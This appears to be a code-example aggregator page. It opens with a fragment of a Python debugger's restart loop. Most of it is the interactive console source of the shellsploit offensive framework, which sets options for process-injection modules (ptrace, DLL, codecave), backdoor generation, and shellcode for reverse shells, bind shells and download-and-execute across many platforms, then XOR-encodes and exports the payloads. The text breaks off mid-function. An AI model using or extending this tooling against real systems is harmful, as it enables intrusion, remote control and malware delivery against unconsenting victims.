                sys.argv = list(dbg.program_sys_argv)
                part1 = ('Restarting %s with arguments:' %
                         dbg.core.filename(mainpyfile))
                args  = ' '.join(dbg.program_sys_argv[1:])
                dbg.intf[-1].msg(Mmisc.wrapped_lines(part1, args,
                                                     dbg.settings['width']))
            else: break
        except SystemExit:
            # In most cases SystemExit does not warrant a post-mortem session.
            break
        except:
            # FIXME: Should be handled above without this mess
            exception_name = str(sys.exc_info()[0])
            if exception_name == str(Mexcept.DebuggerQuit):
                break
            elif exception_name == str(Mexcept.DebuggerRestart):
                dbg.core.execution_status = 'Restart requested'
                if dbg.program_sys_argv:
                    sys.argv = list(dbg.program_sys_argv)
                    part1 = ('Restarting %s with arguments:' %
                             dbg.core.filename(mainpyfile))
                    args  = ' '.join(dbg.program_sys_argv[1:])
                    dbg.intf[-1].msg(
                        Mmisc.wrapped_lines(part1, args,
                                            dbg.settings['width']))
                    pass
            else:
                raise
        pass

    # Restore old sys.argv
    sys.argv = orig_sys_argv
    return
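
The script lookup above first checks the name as given with os.path.isfile() and only falls back to a search (Mclifns.whence_file) when that fails. A simplified sketch of such a path-based lookup (hypothetical find_script helper; trepan's actual whence_file may differ):

import os

def find_script(name, search_path):
    # Return the first existing match for name, checking the name as given first.
    if os.path.isfile(name):
        return name
    for directory in search_path:
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate):
            return candidate
    return None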

Example 48

Project: shellsploit-framework
Source File: control.py
View license
    def control(self, string):
        bash = bcolors.OKBLUE + bcolors.UNDERLINE + "ssf" + bcolors.ENDC
        bash += ":"
        bash += bcolors.RED + string + bcolors.ENDC
        bash += bcolors.OKBLUE + " > " + bcolors.ENDC

        try:
            terminal = raw_input(bash)
        except KeyboardInterrupt:
            B3mB4m.exit("\n[*] (Ctrl + C ) Detected, Trying To Exit ...")

        # Injectors
        if string[:9] == "injectors":
            tab.completion("injectors")
            if terminal[:4] == "help":
                from .core.help import injectorhelp
                injectorhelp()
                self.control(string)

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            # elif terminal[:9] == "need help":
                # import XX
                # print youtubelink for this module

            elif terminal[:4] == "exit":
                B3mB4m.exit("\nThanks for using shellsploit !\n")    

            elif terminal[:4] == "pids":
                B3mB4m.pids("wholelist")
                self.control(string)

            elif terminal[:6] == "getpid":
                B3mB4m.pids(None, terminal[7:])
                self.control(string)

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)

            elif terminal[:5] == "unset":
                if string in B3mB4m.bfdlist():
                    if terminal[6:] == "exe" or terminal[6:] == "file":
                        self.argvlist[0] = "None"   
                    elif terminal[6:] == "host":
                        self.argvlist[1] = "None"
                    elif terminal[6:] == "port":
                        self.argvlist[2] = "None"
                    else:
                        print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)                      

                elif string == "injectors/Windows/x86/tLsInjectorDLL":
                    if terminal[6:] == "exe":
                        self.argvlist[0] = "None"   
                    elif terminal[6:] == "dll":
                        self.argvlist[1] = "None"
                    else:
                        print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)   
                elif string == "injectors/Windows/x86/CodecaveInjector":
                    if terminal[6:] == "exe":
                        self.argvlist[0] = "None"
                    elif terminal[6:] == "shellcode":
                        self.argvlist[1] = "None"                 
                else:
                    if terminal[6:] == "pid":
                        self.argvlist[0] = "None"   
                    elif terminal[6:] == "shellcode":
                        self.argvlist[1] = "None"
                    else:
                        print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)

            elif terminal[:3] == "set":
                if string in B3mB4m.bfdlist():
                    if terminal[4:7] == "exe" or terminal[4:8] == "file":
                        self.argvlist[0] = terminal[9:]
                    elif terminal[4:8] == "host":
                        self.argvlist[1] = terminal[9:]
                    elif terminal[4:8] == "port":
                        self.argvlist[2] = terminal[9:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)

                elif string == "injectors/Windows/x86/tLsInjectorDLL":
                    if terminal[4:7] == "exe":
                        self.argvlist[0] = terminal[8:]
                    elif terminal[4:7] == "dll":
                        self.argvlist[1] = terminal[8:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)

                elif string == "injectors/Windows/x86/CodecaveInjector":
                    if terminal[4:7] == "exe":
                        self.argvlist[0] = terminal[8:]
                    elif terminal[4:13] == "shellcode":
                        self.argvlist[1] = terminal[14:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)

                else:
                    if terminal[4:7] == "pid":
                        self.argvlist[0] = terminal[8:]
                    elif terminal[4:13] == "shellcode":
                        if ".txt" in terminal[14:]:
                            if os.path.isfile(terminal[14:]):
                                # Read the shellcode lines and strip quote/'+' concatenation noise.
                                with open(terminal[14:], "r") as shellcode:
                                    cache = shellcode.readlines()
                                    db = ""
                                    for x in cache:
                                        db += x.strip().replace('"', "").replace('+', "").strip()
                                    self.argvlist[1] = db
                            else:
                                print(bcolors.RED + bcolors.BOLD + "\nFile not found, please try the full path.\n" + bcolors.ENDC)
                                self.control(string)
                        else:
                            self.argvlist[1] = terminal[14:]
                    else:
                        if not terminal:
                            self.control(string)
                        else:
                            print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)

            elif terminal[:14] == "show shellcode":
                if string in B3mB4m.bfdlist():
                    print("This option is not available for this module.")
                    self.control(string)
                elif string == "injectors/Windows/x86/tLsInjectorDLL":
                    self.control(string)
                else:
                    if self.argvlist[1] != "None":
                        B3mB4m.prettyout(self.argvlist[1])
                    else:
                        print("\nYou must set shellcode before this.\n")
                    self.control(string)

            elif terminal[:12] == "show options":
                from .core.Injectoroptions import controlset
                if string in B3mB4m.bfdlist():
                    controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    self.control(string)
                else:
                    if string != "injectors/Windows/x86/tLsInjectorDLL":
                        if self.argvlist[1] != "None":
                            self.mycache = "process"
                            controlset(string, self.argvlist[0], self.mycache)
                            self.control(string)
                    controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)   

            elif terminal[:2] == "os":
                B3mB4m.oscommand(terminal[3:])
                self.control(string)

            elif terminal[:6] == "inject":
                if self.argvlist[0] == "None" or self.argvlist[1] == "None":
                    print("\nYou must set pid/shellcode before injecting !\n")
                    self.control(string)
                if string == "injectors/Linux86/ptrace":
                    from .inject.menager import linux86ptrace
                    linux86ptrace(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Linux64/ptrace":
                    from .inject.menager import linux64ptrace
                    linux64ptrace(self.argvlist[0], self.argvlist[1])                  
                elif string == "injectors/Windows/byteman":
                    from .inject.menager import windows
                    windows(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Windows/x86/tLsInjectorDLL":
                    from .inject.menager import winx86tLsDLL
                    winx86tLsDLL(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Windows/x86/CodecaveInjector":
                    from .inject.menager import winx86Codecave
                    winx86Codecave(self.argvlist[0], self.argvlist[1])
                elif string == "injectors/Windows/Dllinjector":
                    from .inject.menager import winDLL
                    winDLL(self.argvlist[0], self.argvlist[1])        

                elif string == "injectors/Windows/BFD/Patching":
                    from .inject.menager import winBFD
                    winBFD(self.argvlist[0], self.argvlist[1], int(self.argvlist[2]))

                # elif string == "injectors/MacOSX/BFD/Patching":
                    # from .inject.menager import MacBFD
                    # MacBFD( FILE, HOST, PORT)          

                # elif string == "injectors/Linux/BFD/Patching":
                    # from .inject.menager import LinuxBFD
                    # LinuxBFD( FILE, HOST, PORT)

                # elif string == "injectors/Linux/ARM/x86/BFD/Patching":
                    # from .inject.menager import LinuxARMx86BFD
                    # LinuxARMx86BFD( FILE, HOST, PORT)                    

                # elif string == "FreeBSD/x86/BFD/Patching":
                    # from .inject.menager import FreeBSDx86
                    # FreeBSDx86( FILE, HOST, PORT)                    

                self.control(string)

            # elif terminal[:7] == "extract":
                # Future option
                # Make it executable (Dynamic virus land)
                # from bla bla import executable
                # generator()

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            else:
                if not terminal:
                    self.control(string)
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                    self.control(string)

        # Backdoors
        elif string[:9] == "backdoors":
            tab.completion("backdoors")
            if terminal[:4] == "help":
                from .core.help import backdoorshelp
                backdoorshelp()
                self.control(string)

            elif terminal[:4] == "exit":
                B3mB4m.exit("\nThanks for using shellsploit !\n")

            elif terminal[:2] == "os":
                B3mB4m.oscommand(terminal[3:])
                self.control(string)

            elif terminal[:12] == "show options":       
                from .core.SHELLoptions import controlset
                controlset(string, self.argvlist[0], self.argvlist[1])
                self.control(string)

            elif terminal[:5] == "unset":
                if terminal[6:] == "lhost":
                    self.argvlist[0] = "None"   
                elif terminal[6:] == "lport":
                    self.argvlist[1] = "None"
                # elif terminal[6:] == "encoder":
                    # self.argvlist[2] = "None"
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                self.control(string)

            elif terminal[:3] == "set": 
                if terminal[4:9].lower() == "lhost":
                    self.argvlist[0] = terminal[10:]
                elif terminal[4:9].lower() == "lport":
                    self.argvlist[1] = terminal[10:]
                # elif terminal[4:11].lower() == "encoder"
                    # self.argvlist[2] = terminal[11:]
                else:
                    print(bcolors.RED + bcolors.BOLD + "This option is not available." + bcolors.ENDC)
                self.control(string)

            elif terminal[:8] == "generate":
                from .Session.generator import process
                # Custom output path will be added ..
                if self.argvlist[0] == "None" or self.argvlist[1] == "None":
                    print("\nSet options before generating the payload.\n")
                    self.control(string)
                else:
                    process(data=string, HOST=self.argvlist[0], PORT=self.argvlist[1], ENCODER=False, logger=True)
                    self.control(string)

            elif terminal[:5] == "clear":
                B3mB4m.clean()
                self.control(string)

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            else:
                if not terminal:
                    self.control(string)
                else:
                    print(bcolors.RED + bcolors.BOLD + "[-] Unknown command: {0}".format(terminal) + bcolors.ENDC)
                    self.control(string)

        # Shellcodes
        else:
            tab.completion("shellcodes")
            if terminal[:4] == "help":
                # if terminal[5:11] == "output":
                    # from Outputs.exehelp import help
                    # print help()
                    # self.control( string)
                from .core.help import shellcodehelp
                shellcodehelp()
                self.control(string)

            elif terminal[:2] == "os":
                B3mB4m.oscommand(terminal[3:])
                self.control(string)

            elif terminal[:4] == "back":
                self.argvlist = ["None", "None", "None", "None"]
                pass

            elif terminal[:4] == "exit":
                B3mB4m.exit("\nThanks for using shellsploit !\n")

            elif terminal[:10] == "whatisthis":
                from .core.whatisthis import whatisthis
                if "egg" in string:
                    message = "Egg-hunt"
                elif "tcp" in string or "reverse" in string or "netcat" in string:
                    message = "Remote"
                elif "download" in string:
                    message = "Download and execute"
                else:
                    message = "Local"
                # Add special part for particul
                whatisthis(message)
                self.control(string)

            elif terminal[:5] == "unset":
                if terminal[6:] == "encoder":
                    self.argvlist[0] = "None"   
                elif terminal[6:] == "iteration":
                    self.argvlist[1] = "None"
                elif terminal[6:] == "file":
                    if string in B3mB4m.readlist():
                        self.argvlist[2] = "None"
                    else:
                        B3mB4m.invalidcommand()
                elif terminal[6:] == "port":
                    if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
                        self.argvlist[2] = "None"
                    else:
                        B3mB4m.invalidcommand()
                elif terminal[6:] == "command":
                    if string in B3mB4m.execlist():
                        self.argvlist[2] = "None"
                    else:
                        B3mB4m.invalidcommand()
                elif terminal[6:] == "link":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[2] = "None"
                    else:
                        B3mB4m.invalidcommand()			
                elif terminal[6:] == "filename":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[3] = "None"
                    else:
                        B3mB4m.invalidcommand()	
                elif terminal[6:] == "host":
                    if string in B3mB4m.reversetcplist():
                        self.argvlist[3] = "None"
                    else:
                        B3mB4m.invalidcommand()	
                else:
                    B3mB4m.invalidcommand()
                self.control(string)

            elif terminal[:3] == "set":
                if terminal[4:8] == "file":
                    if string in B3mB4m.readlist():
                        self.argvlist[2] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:8] == "port":
                    if string in B3mB4m.tcpbindlist() or string in B3mB4m.reversetcplist():
                        self.argvlist[2] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:11] == "command":
                    if string in B3mB4m.execlist():
                        self.argvlist[2] = terminal[12:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:8] == "link":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[2] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:11] == "message":
                    if string in B3mB4m.messageboxlist():
                        self.argvlist[2] = terminal[12:]
                    else:
                        B3mB4m.invalidcommand()   
                elif terminal[4:8] == "host":
                    if string in B3mB4m.reversetcplist():
                        self.argvlist[3] = terminal[9:]
                    else:
                        B3mB4m.invalidcommand()
                elif terminal[4:12] == "filename":
                    if string in B3mB4m.downloadandexecutelist():
                        self.argvlist[3] = terminal[13:]
                    else:
                        B3mB4m.invalidcommand()					
                elif terminal[4:11] == "encoder":
                    from .core.lists import encoders
                    if terminal[12:] not in encoders():
                        print("This encoder is not in the list !")
                        self.control(string)
                    self.argvlist[0] = terminal[12:]
                elif terminal[4:13] == "iteration":
                    self.argvlist[1] = terminal[14:]
                else:
                    B3mB4m.invalidcommand()     
                self.control(string)   

            elif terminal[:12] == "show options":
                from .core.SHELLoptions import controlset
                if string[:7] == "linux86":
                    if string == "linux86/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/chmod":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/reverse_tcp":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/download&exec":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux86/exec":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:10] == "solarisx86":
                    if string == "solarisx86/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "solarisx86/reverse_tcp":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1]) 
                    elif string == "solarisx86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])     
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:7] == "linux64":
                    if string == "linux64/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])                   
                    elif string == "linux64/mkdir":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux64/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])               
                    elif string == "linux64/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:5] == "linux":
                    if string == "linux/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "linux/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])                 
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:5] == "osx86":
                    if string == "osx86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "osx86/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[1], self.argvlist[0])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:5] == "osx64":
                    if string == "osx64/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "osx64/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])

                    self.control(string)

                elif string[:11] == "freebsd_x86":
                    if string == "freebsd_x86/reverse_tcp2":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "freebsd_x86/reverse_tcp":
                        controlset(string, self.argvlist[3], self.argvlist[2], self.argvlist[0], self.argvlist[1])             
                    elif string == "freebsd_x86/read":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "freebsd_x86/exec":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])                   
                    elif string == "freebsd_x86/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:11] == "freebsd_x64":
                    if string == "freebsd_x64/tcp_bind":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
                    elif string == "freebsd_x64/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1]) 
                    elif string == "freebsd_x64/exec":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:9] == "linux_arm":
                    if string == "linux_arm/chmod":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    elif string == "linux_arm/exec":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    elif string == "linux_arm/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:10] == "linux_mips":
                    if string == "linux_mips/chmod":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    elif string == "linux_mips/reverse_tcp":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
                    elif string == "linux_mips/tcp_bind":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2])
                    else:
                        controlset(string, self.argvlist[0], self.argvlist[1])
                    self.control(string)

                elif string[:7] == "windows":
                    if string == "windows/messagebox":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])
                    elif string == "windows/exec":
                        controlset(string, self.argvlist[1], self.argvlist[0], self.argvlist[2])
                    elif string == "windows/download&execute":
                        controlset(string, self.argvlist[0], self.argvlist[1], self.argvlist[2], self.argvlist[3])
                    elif string == "windows/reverse_tcp":
                        controlset(string, self.argvlist[2], self.argvlist[3], self.argvlist[0], self.argvlist[1])
                    elif string == "windows/tcp_bind":
                        controlset(string, self.argvlist[2], self.argvlist[0], self.argvlist[1])                  
                    self.control(string)

            elif terminal[:8] == "generate":
                from .database.generator import generator
                if string[:7] == "linux86":
                    if string == "linux86/binsh_spawn":
                        self.disassembly = generator("linux86", "binsh_spawn")

                    elif string == "linux86/read":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "read", FILE=self.argvlist[2])

                    elif string == "linux86/exec":
                        if self.argvlist[2] == "None":
                            print("\nCommand must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "exec", COMMAND=self.argvlist[2])

                    elif string == "linux86/download&exec":
                        if self.argvlist[2] == "None":
                            print("\nLink must be declared.\n")
                            self.control(string)
                        elif "/" not in self.argvlist[2]:
                            print("\nWrong URL format, example: 127.0.0.1/X\n")
                            self.control(string)
                        elif len(self.argvlist[2].split("/")[-1]) != 1:
                            print("\nYour filename must be one character long.\n")
                            self.control(string)

                        if "http" in self.argvlist[2] or "https" in self.argvlist[2] or "www." in self.argvlist[2]:
                            try:
                                edit = self.argvlist[2].replace("http://", "").replace("https://", "").replace("www.", "")
                                self.argvlist[2] = edit
                            except:
                                pass
                        self.disassembly = generator("linux86", "download&exec", URL=self.argvlist[2])

                    elif string == "linux86/chmod":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "chmod", FILE=self.argvlist[2])

                    elif string == "linux86/tcp_bind":
                        if self.argvlist[2] == "None":
                            print("\nPORT must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "tcp_bind", port=self.argvlist[2])

                    elif string == "linux86/reverse_tcp":   
                        if self.argvlist[2] == "None" or self.argvlist[3] == "None": 
                            print("\nHost&Port must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:7] == "linux64":
                    if string == "linux64/binsh_spawn":
                        self.disassembly = generator("linux64", "binsh_spawn")
                    elif string == "linux64/tcp_bind":
                        self.disassembly = generator("linux64", "tcp_bind", port=self.argvlist[2])
                    elif string == "linux64/reverse_tcp":
                        self.disassembly = generator("linux64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "linux64/read":
                        self.disassembly = generator("linux64", "read", FILE=self.argvlist[2])    

                elif string[:5] == "linux":
                    if string == "linux/read":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("linux", "read", FILE=self.argvlist[2])
                    elif string == "linux/binsh_spawn":
                        self.disassembly = generator("linux", "binsh_spawn")
                    elif string == "linux/tcp_bind":
                        self.disassembly = generator("linux", "tcp_bind", port=self.argvlist[2])
                    elif string == "linux/reverse_tcp":
                        self.disassembly = generator("linux", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:5] == "osx86":
                    if string == "osx86/tcp_bind":
                        self.disassembly = generator("osx86", "tcp_bind", port=self.argvlist[2])
                    elif string == "osx86/binsh_spawn":
                        self.disassembly = generator("osx86", "binsh_spawn")
                    elif string == "osx86/reverse_tcp":
                        self.disassembly = generator("osx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:5] == "osx64":
                    if string == "osx64/binsh_spawn":
                        self.disassembly = generator("osx64", "binsh_spawn")
                    elif string == "osx64/tcp_bind":
                        self.disassembly = generator("osx64", "tcp_bind", port=self.argvlist[2])
                    elif string == "osx64/reverse_tcp":
                        self.disassembly = generator("osx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])

                elif string[:11] == "freebsd_x86":
                    if string == "freebsd_x86/binsh_spawn":
                        self.disassembly = generator("freebsdx86", "binsh_spawn")
                    elif string == "freebsd_x86/read":
                        self.disassembly = generator("freebsdx86", "read", FILE=self.argvlist[2])
                    elif string == "freebsd_x86/reverse_tcp":
                        self.disassembly = generator("freebsdx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "freebsd_x86/reverse_tcp2":
                        self.disassembly = generator("freebsdx86", "reverse_tcp2", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "freebsd_x86/exec":
                        self.disassembly = generator("freebsdx86", "exec", COMMAND=self.argvlist[2])
                    elif string == "freebsd_x86/tcp_bind":
                        self.disassembly = generator("freebsdx86", "tcp_bind", port=self.argvlist[2])

                elif string[:11] == "freebsd_x64":
                    if string == "freebsd_x64/binsh_spawn":
                        self.disassembly = generator("freebsdx64", "binsh_spawn")
                    elif string == "freebsd_x64/tcp_bind":
                        self.disassembly = generator("freebsdx64", "tcp_bind", port=self.argvlist[2], PASSWORD=self.argvlist[3])
                    elif string == "freebsd_x64/reverse_tcp":
                        self.disassembly = generator("freebsdx64", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "freebsd_x64/exec":
                        self.disassembly = generator("freebsdx64", "exec", COMMAND=self.argvlist[2])

                elif string[:9] == "linux_arm":
                    if string == "linux_arm/chmod":
                        self.disassembly = generator("linux_arm", "chmod", FILE=self.argvlist[2])
                    elif string == "linux_arm/binsh_spawn":
                        self.disassembly = generator("linux_arm", "binsh_spawn")
                    elif string == "linux_arm/reverse_tcp":
                        self.disassembly = generator("linux_arm", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "linux_arm/exec":
                        self.disassembly = generator("linux_arm", "exec", COMMAND=self.argvlist[2])    

                elif string[:10] == "linux_mips":
                    if string == "linux_mips/reverse_tcp":
                        self.disassembly = generator("linux_mips", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "linux_mips/binsh_spawn":
                        self.disassembly = generator("linux_mips", "binsh_spawn")
                    elif string == "linux_mips/chmod":
                        self.disassembly = generator("linux_mips", "chmod", FILE=self.argvlist[2])
                    elif string == "linux_mips/tcp_bind":
                        self.disassembly = generator("linux_mips", "tcp_bind", port=self.argvlist[2])

                elif string[:7] == "windows":
                    if string == "windows/messagebox":
                        self.disassembly = generator("windows", "messagebox", MESSAGE=self.argvlist[2])
                    elif string == "windows/download&execute":
                        self.disassembly = generator("windows", "download&execute", URL=self.argvlist[2], FILENAME=self.argvlist[3])
                    elif string == "windows/exec":
                        self.disassembly = generator("windows", "exec", COMMAND=self.argvlist[2])
                    elif string == "windows/reverse_tcp":
                        self.disassembly = generator("windows", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])                  
                    elif string == "windows/tcp_bind":
                        self.disassembly = generator("windows", "tcp_bind", port=self.argvlist[2])

                elif string[:10] == "solarisx86":                   
                    if string == "solarisx86/binsh_spawn":
                        self.disassembly = generator("solarisx86", "binsh_spawn")
                    elif string == "solarisx86/read":
                        if self.argvlist[2] == "None":
                            print("\nFile name must be declared.\n")
                            self.control(string)
                        self.disassembly = generator("solarisx86", "read", FILE=self.argvlist[2])
                    elif string == "solarisx86/reverse_tcp":
                        self.disassembly = generator("solarisx86", "reverse_tcp", ip=self.argvlist[3], port=self.argvlist[2])
                    elif string == "solarisx86/tcp_bind":
                        self.disassembly = generator("solarisx86", "tcp_bind", port=self.argvlist[2])

                if self.argvlist[0] == "x86/xor_b3m":
                    from .encoders.shellcode.xor_b3m import prestart
                    # Default to a single iteration when unset or zero.
                    if self.argvlist[1] in ("None", "0"):
                        self.argvlist[1] = 1
                    self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))

                elif self.argvlist[0] == "x86/xor":
                    from .encoders.shellcode.xor import prestart
                    # Default to a single iteration when unset or zero.
                    if self.argvlist[1] in ("None", "0"):
                        self.argvlist[1] = 1
                    self.disassembly = prestart(self.disassembly.replace("\\x", ""), int(self.argvlist[1]))

                else:
                    # No encoder selected; keep the shellcode as generated.
                    pass

                # print "\n"+"Shellcode Length : %d" % len(str(bytearray(self.disassembly.replace("\\x", "").decode("hex"))))
                B3mB4m.prettyout(self.disassembly)
                self.control(string)

            elif terminal[:6] == "output":
                if self.disassembly == "None":
                    print("Please generate shellcode before saving it.")
                    self.control(string)   

                # I'm not sure about this option; should it take params
                # or direct input ? ..
                if terminal[7:10].lower() == "exe":
                    # Missing parts will be added ..
                    if "linux86" in terminal.lower():
                        OS = "linux86"
                    elif "linux64" in terminal.lower():
                        OS = "linux64"
                    elif "windows" in terminal.lower():
                        OS = "windows"
                    elif "freebsdx86" in terminal.lower():
                        OS = "freebsdx86"
                    elif "freebsdx64" in terminal.lower():
                        OS = "freebsdx64"
                    elif "openbsdx86" in terminal.lower():
                        OS = "openbsdx86"
                    elif "solarisx86" in terminal.lower():
                        OS = "solarisx86"
                    elif "linuxpowerpc" in terminal.lower():
                        OS = "linuxpowerpc"
                    elif "openbsdpowerpc" in terminal.lower():
                        OS = "openbsdpowerpc"           
                    elif "linuxsparc" in terminal.lower():
                        OS = "linuxsparc"
                    elif "freebsdsparc" in terminal.lower():
                        OS = "freebsdsparc"
                    elif "openbsdsparc" in terminal.lower():
                        OS = "openbsdsparc"
                    elif "solarissparc" in terminal.lower():
                        OS = "solarissparc"
                    elif "linuxarm" in terminal.lower():
                        OS = "linuxarm"
                    elif "freebsdarm" in terminal.lower():
                        OS = "freebsdarm"
                    elif "openbsdarm" in terminal.lower():
                        OS = "openbsdarm"
                    else:
                        OS = None

                    from .Outputs.exe import ExeFile
                    ExeFile(self.disassembly, OS)
                    self.control(string)

                elif terminal[7:10].lower() == "c++" or terminal[7:10].lower() == "cpp":
                    from .Outputs.Cplusplus import CplusplusFile
                    if "windows" in string:
                        CplusplusFile(self.disassembly, True)
                    else:
                        CplusplusFile(self.disassembly)

                elif terminal[7:8].lower() == "c":
                    if "windows" in string:
                        from .Outputs.Cplusplus import CplusplusFile
                        CplusplusFile(self.disassembly, True)
                    else:
                        from .Outputs.C import CFile
                        CFile(self.disassembly)                

                elif terminal[7:9].lower() == "py" or terminal[7:13].lower() == "python": 
                    from .Outputs.python import PyFile
                    PyFile(self.disassembly)

                elif terminal[7:10].lower() == "txt":
                    from .Outputs.txt import TxtFile
